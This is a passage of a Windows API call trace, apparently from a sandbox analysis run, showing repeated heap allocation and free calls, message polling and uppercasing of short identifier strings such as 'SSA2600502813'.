lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8889) returned 0x37d0050 [0210.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0020 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8889) returned 0x2a8a938 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0210.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.741] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8889) returned 0x37d0050 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.742] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0210.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8889) returned 0x37d0050 [0210.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0210.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8889) returned 0x2a931d0 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0210.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.745] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0210.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0210.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0210.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0210.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0210.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.751] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0210.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.751] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.752] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: 